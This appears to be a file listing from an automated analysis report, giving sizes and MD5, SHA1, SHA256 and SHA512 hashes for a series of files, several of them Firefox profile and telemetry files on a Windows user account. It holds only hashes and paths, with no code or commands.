MD5b319ac6eebf5309c09a2343aa872bb45
SHA136c20894e6b4eab76812276b35acf42b1e843bb8
SHA256d6d59048de8343ea4e41f256925e6f453b9b7d3fd0212e566cd90c9bd6235566
SHA5129fe8b5dc04404061557327b6bc20b91a22a800daa8b56a9befbb6ba9f1ec79ee9c74d653bbf41680a3e2f6f68e81f5ce22103df02502d7ca05b4db499bd5c652
-
Filesize
674KB
MD5c6a119bfd5690fd9740d4b0ceda18c46
SHA1df5dab76f8b434996d47261010066764b514d016
SHA2569d2adad9a2ce99316677b5133953f620720286d5820c0d54adb610ddb71cb8bd
SHA5127b32de5296b3b73965fb8b274229402673c5ac993f8abafc3304e48e1cf44bfd5fb40433948d7616ded8bf5da251bbfe152287a11b7e072d42ab609854cf659a
-
Filesize
4.6MB
MD596f6dee92d3e2edaad3c7f95ad532e48
SHA1aedccebaddd835f9e57e31cc25c849638c47f99a
SHA256c6536170c6e574e2e906d7b455b77e25764688d4ed964a681aadcaff24bc66d3
SHA51260060136f1123e3ebc5b5bce8022b8be35242b0d35bc9ed008bf3a36b248751a7da0c1ea19d7d95e87a43cc6a6ad1fef1f60fa271ca88a3f5e25e3c6a62abb54
-
Filesize
4.4MB
MD555ef0f1e3fd6c311c6fe8b2087c7248f
SHA194f876277f5f0d7b97183ef60cde008fb9e14c50
SHA25643f2da85334a1f55a2d9d48cc4b3a7f10e1762fcdb1fb2af5c7dfa3c85d7730a
SHA512f05e0aad938cf5b40fd58f1b4f31ee86f8db0bd16b1645a6545c1e3e6c75f82f9d2657c6602e9d8e4db8d279a7a489417e87f3c856fa9348aa120e8de290f2f4
-
Filesize
28.1MB
MD58bb05367683f7234d44082d6d218eb93
SHA1642be518acd284344d6b3a688508ad011fba5601
SHA25664c648cb4e1778ea36c85eeeef3744ee724e1852b2cf0c02c30202db4c4a949c
SHA51236de01e264cd36aa2a27d1d7f737d34838d38f7513df339cbef53e943d9cbf886ad054e74c73ef6013e0faff37031e0acbec90e18087a348bb3446b5f55864a3
-
Filesize
667KB
MD50afa04b1f3d5b4eb402367bd172e0957
SHA17e0e77df6601ae29af49e85b741cec23b93bff6f
SHA256f0a9ef468c521425b19517c69a315ac2acbc2f1a6b48d3a29c2faf1777979205
SHA51299d89102a1cf337cae4644ba2ca12b15ab63573829aa6817f3d6381febc0133056d451f4b63dcf7c7cd14ce4ca2554221084fc1b18a29f4f0c00dabeaea9ef9c
-
Filesize
2.0MB
MD58978bcf53b3f0678ed355ec2f16e9cf4
SHA1d0691ac7211e21ac15b59a5ccac6e2d2788c6e1e
SHA256330fda4e036f1d227a5fa8e416559923b3dc5b9ed9bfb2e92ec22b48395f24b9
SHA512a59376e7c47bf226a97a068f3a3e5ae10c4f885613af8f9cc8eea0a52b08a4c13e314f14f3c8fd9c286ce435dcdf342d72647ca5a27ab666b3f9154f7bc86b5b
-
Filesize
2.4MB
MD58c7d359343cea4f85312bf683e8293ac
SHA1498a5c092fb946a73156f847eaf65dc58d3306f0
SHA25630cd9977b8c440fb6b9aadeca7e7d170058ae432b955ee5aba5da836e37789d0
SHA5124054bc770b7bbaddec618e1b11324b0a164cce07909fe2d6367bdc5c1932137ce02d7eb32c0e0f50ea81fb5cdfca4e7527ebfd2ecf7b1beae6877911bb33e23d
-
Filesize
950KB
MD5def1c8fa3b480332a08446920d5607b3
SHA126e92a2a2bed2ea3136b4f6e5a007d933cbc1be7
SHA256ad7af0d8b244f35b98fa378ad09289afd07f3463f2870208ba1cbefacf2f5537
SHA51262e9c987ad3bc9cdac0b46f5adfe3b890cc299359069f0505c864e9c6b5299e7623193fe668313865e1f32860af4e55f1544f4fc9770ce4b79143985d5c11fa9
-
Filesize
1.9MB
MD5d7661a891807b6508edab51e1cb60b25
SHA1ae6ea41a17ddd2995836ab9279207a5b444d539a
SHA2569395ad01afdd8d4a4b6dff33bf6e82e502d765f0a63315a88a97ba4279dcbb16
SHA512b909887acebba72a4f5f1516a51f64b9676fa77faa39b86283b639c7115e081d37758246b3f9d4bfaee726e3174d71154235da097b55ebbe943d942ec03883e4
-
Filesize
716KB
MD557a5e092cf652a8d2579752b0b683f9a
SHA16aad447f87ab12c73411dec5f34149034c3027fc
SHA25629054ff2ce08e589dcc28d1e831f0c99659148f1faaabc81913207c4d12b4a34
SHA5125759fc4bf73a54899fb060df243cdd1c1629504b20695d7116317a1941ef1f86449c9c3388d5a48bc7e4223207c985eadba1950e15c045d15890423701ba1b1f
-
Filesize
358KB
MD5e604fe68e20a0540ee70bb4bd2d897d0
SHA100a4d755d8028dbe2867789898b1736f0b17b31c
SHA2566262dac7e6839a9300b48f50d6d87011fc3e9baae5bbcec14ba00b7a6da6f361
SHA512996216993cc5e07e73d6b3c6485263537377c6b5af94a8b681216e7c5f8383672408998d4186a73f5fe83d94f48bf0a54d6a7c2ca82d3aa825ade2462db0bd89
-
Filesize
1.4MB
MD5f3f9535109155498021e63c23197285f
SHA1cf2198f27d4d8d4857a668fa174d4753e2aa1dca
SHA2561ec54b5a3d71165f456a6e441bd7d6d85500973f953b9d6388c1c24a35cc449f
SHA512a05607b2d128055117877682f05b5abf1777addcb79debdac812cbc78cbef56ca87abca463b6fa96679172f580fd1603e7e470b7484248a3cdde0c0bc3124755
-
Filesize
730KB
MD531aeed8d880e1c68a97f0d8739a5df8a
SHA1d6f140d63956bc260639ab3c80f12a0e9b010ee9
SHA256bc7e489815352f360b6f0c0064e1d305db9150976c4861b19b614be0a5115f97
SHA512bacbe9af92bf8f2adb7997d6db2f8a8fe833dbcef5af0cc465f6e41c2f409019b740c82f4b587d60ce1446f9cf10ebcb638bdf8d5fe05c7e8e8c518b747b6748
-
Filesize
717B
MD5ada3ccf5da86586bbe0153e2f850e45d
SHA19c063c8cc3d384bfe609cea2866213c3fb2d59dc
SHA256a7dfe619c548588941a1ad9f9e9d7b7bb81bb3efffa71d6c014f676404644277
SHA512e3e6abfb9284741ad49849de3bb82e2cb12fc784547efae8098d2ea4e87a36c6c0006a20257b0068a675d86cfc8fb35097ac2dc1969e12fab8866abfbd9ff826
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.4MB
MD5e4c43138ccb8240276872fd1aec369be
SHA1cb867b89b8bf19a405a5eee8aa7fe07964f1c16c
SHA25646be5e3f28a5e4ed63d66b901d927c25944b4da36effea9c97fb05994360edf5
SHA512f25ad4d0442d6bbd3bdf3320db0869404faba2cab2425bcb265721889b31a67c97ae5b464e09932f49addd4d2575a5e0672c06b9ab9bdecbdd2fe9c766c2ec91
-
Filesize
703KB
MD51778c1f66ff205875a6435a33229ab3c
SHA15b6189159b16c6f85feed66834af3e06c0277a19
SHA25695c06acac4fe4598840e5556f9613d43aa1039c52dac64536f59e45a70f79da6
SHA5128844de1296ce707e3c5c71823f5118f8f2e50287ace3a2ee1ec0b69df0ec48ebcf5b755db669d2cd869d345fb06a9c07b36e98eda8c32a9b26b8fe22bdc105a0
-
Filesize
2.9MB
MD5b826dd92d78ea2526e465a34324ebeea
SHA1bf8a0093acfd2eb93c102e1a5745fb080575372e
SHA2567824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b
SHA5121ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\AlternateServices.bin
Filesize8KB
MD5681fcadf58ab0a5e501a64ac0ebcb372
SHA1bf15640c43c3a82888aebf8c0ecf55052553ca3e
SHA256d67235e2c98cbb48998492c44e58f3c1cc693317691486071445ed987efe49b9
SHA5123a0584f3a037d79a2baf99f80ec0b865f7a2b4650d5d7828b1bc49a20f43b63639095fe649b8b811078d9db650dd90e283af5eb319e4ee244b0a5bc4117c89d2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp
Filesize7KB
MD56e94a09e8bec615f3346934472c1e483
SHA17719641bd1fb5c85f3d9f83d5b8d39b36c465233
SHA25649481b3763c476f5ed061938661dacc24056d73a0c291c89305dc18ff5e1c068
SHA5124eb45a7e733f3956e9c341a3f89f72397f1eb048af5a1b4cf6c23518398ad4aa50d22d2135840b5338b44fb7f8cf696b1a401eb74c0db9ba0b803c626de0a14d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5800a056928d1ea0e50c88c56b2ba9206
SHA10e9dc66fa3e75a437a19d7a953bf24356b338f15
SHA25621e6f7a185e2b32a758a717aae71908f9954669387974ef64ae2c3cb00be2541
SHA5123bf9f17da696825331745a00237dfc00a091ec1638b957772d3b6aecda5f1524b2a537634eda6698453df3b59d691afb4e44a642af5206ffe08de5aff04d8528
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\events\events
Filesize1KB
MD55fea8f494891563fa3eda6f05342f052
SHA1947309400f148836d65b0a9ba9fbb70a3959babc
SHA256c20cf86be749e55be8ca1e491ebfeffe2e2e437a1def0e5b702797c31c38a20b
SHA51207ddcfd7279a0a56de715206ec45a72bf64561960ae2d90ef4b74c2123e32779783648877b180f99a935b5989a562ed5d8237ccafa18d6bf9be209737e3df682
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\128dce6f-7c8d-4a0c-97f2-5c43bb1e44de
Filesize16KB
MD5bb710b004df4d27e5087a51bef94ae1c
SHA111d6058468925da54f02ca14a09d4f23fb260ee4
SHA2569f06e0e07605de2fe4687e8846254da7b5a430948845fa2d09825c918f90933b
SHA51234684be2adf9c8141cc30b683a5ffa9f4750d83cb715b1665489571e668c6b2052f54f0903597eccdaead0efdd78c5fed9421b2c34844e07ad24e0a828f10552
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\4a8df8fc-7ab9-48c8-8dd2-6a3d25117ff5
Filesize235B
MD5905df8e2d0aecaafdaf9debbf0e9efeb
SHA184148dac396d8aeb6d9ee40f3e833d7b6df463c7
SHA256b6cc6922fb6c03c8cbf520081e458a4918e2acefe191cf303e822412a2ee82b0
SHA512985384e0f9b5e247aec1ed67990af475b47b8bc591ebd061857dd22cd80428932a72caf6e0e6521ebc5fb41017115703cabe9003ff6420462db4093d8d1e9b1a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\ab950ce5-8289-4dbd-9a5f-8e85cda12d6e
Filesize2KB
MD53372fc25ed5df81f9387307bfe4d1311
SHA1c2837204e15cf65efb493ee024385ae9c9b17f24
SHA256b5f5c3f5dada1c104f0182ebf92b6c8e93bb29639f768c94ca8fe80312a0da97
SHA512a470e6da8cd712d31d50d098265f98c189d2856bc87f54dccd3e2c9b7fe41d036e2737db2d79a3f86b080253bdf1e7e89658477dc7c29f7164bba69e2e14d210
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\c0f8a283-6ab2-4de1-afd1-47aac392b576
Filesize235B
MD5df410fbaf03114b78a873ad0115c2bd6
SHA12c6bf6f5b0d9fcc7ccb7cb710e071c036aa3dd65
SHA25604e07c6060e0bc5259b1c54fcb782e66c7989afbc861452d38d06a8acb0a8251
SHA5121edd1ffaf9410f2344d8e43751cac07a17b0a4cdd81b0ebdd310026ea0fa1c403f86cfb23ecb59ecfcb83a8d742bde6cd376b63c6fbf74be7bea1dcc60b6a444
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\e5a76647-803b-4caf-9cb0-64f05f6bdb99
Filesize886B
MD592cce65b5509bd5cc9875675cbb3fac2
SHA1ccbcc7cf152c2738e07ce05c0d1750085d82a6b6
SHA25627620f13c172885775b0f93e404f484ee197b1f8fb605058ea836d462f98ffd0
SHA512c98641b176719c770899a63be3ad6edd06ebb3a8378385d9bb609ea87408dd0d48fe7e4c03acb2ff5b137a920c317b2abe93fedbf4aa049c37928e8189f4b68f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\f4833e20-a353-4887-a198-cb38431ff943
Filesize883B
MD589aa51f1c0e97e3d5a5b1b43c7e9ed0f
SHA1071201c7b62f14575fe5c9b40be374389b5b6bca
SHA2565502b5f80c62f150f2e2f4ccdf80068f69348b7249250a75f7b3d4d8050ef8bc
SHA512ff213f28f3927e789a630ce1367b84e41d84a92868e986f69af58342a372a8848a7102a719039d40774ad2fa3904f95b0cd7cccce003b8fafc5a2a5ee372d6b9
-
Filesize
6KB
MD5867f915735b618ae302e89d200bca25f
SHA17f415f45da959acb7e807b76e94fb7657f876893
SHA25643a5e9fecf4e35fc649affd24a42f6499867463176e59aa826bc86f3f2a41d3a
SHA5120c1c486de08b6f29972073af8b60222a9a78a7ceb97c64bef6e98fca1dfb19b7b229864888cd9541bbc2b9c4cfee7f84fde7e31ae5553df397aef740fa0026d3
-
Filesize
6KB
MD5d54f9667bd854c61598fe1de67a79104
SHA134e2134032deddcf6b479e4724a4616978cc3300
SHA256206e2917671a799024777b9e0ad6f48df25fb229857f5af959c13168f9702d8b
SHA5120e15b769ac61b78ddd7008e4c69463c3832c5b92004c450b8c71048e8e65145ac89b26591fd6b19d4e45ddbce7054cf2c7d8679a313e02923608c0fb42eb622e
-
Filesize
3.1MB
MD5a02164371a50c5ff9fa2870ef6e8cfa3
SHA1060614723f8375ecaad8b249ff07e3be082d7f25
SHA25664c731adbe1b96cb5765203b1e215093dcf268d020b299445884a4ae62ed2d3a
SHA5126c6903f3a3092fd3d63c373189f2c06e12de032ee4fd6b80a15f58eaeb2079f3ae8a8bcdac85a358b1f9070b192b1c8260f9aa127d009b5afce475f966e91326
-
Filesize
7.9MB
MD5c1a3f345bc40395d0d5953de69c9715b
SHA1a0c799e86713dfc2426ddfdcf5a07a286ef9dc3c
SHA2561dbd18c553900358b832906972caea7af26c74b80fc298dc67a3bbb83c9f18d2
SHA512f6832cc4404ac439a006dd9442ca753bc2abfe7ae464aff8b7771892576d66427353ce8e8b54a4c3e14a21ba0b9bb4a49d43c5df5496fedbc68aac8e40831a4d
-
Filesize
2KB
MD579a6cbfb6850e650998596fc9cfeb8b7
SHA1414a178003f932fd81b98fd04d6c2bdb2f8713be
SHA256811f5f7d50036d4ecc565ff1fe7bf785880ffc071113c89e7ee4ddb0a943b200
SHA51219562561c7241ef5fa4b4fa5a8aa4b9effafd8d00ea49fc6d6c9a382512bc8c9d830fbdc1439e2c4119292b41a289674be3558cb303fb3c6ddd6be093c771e97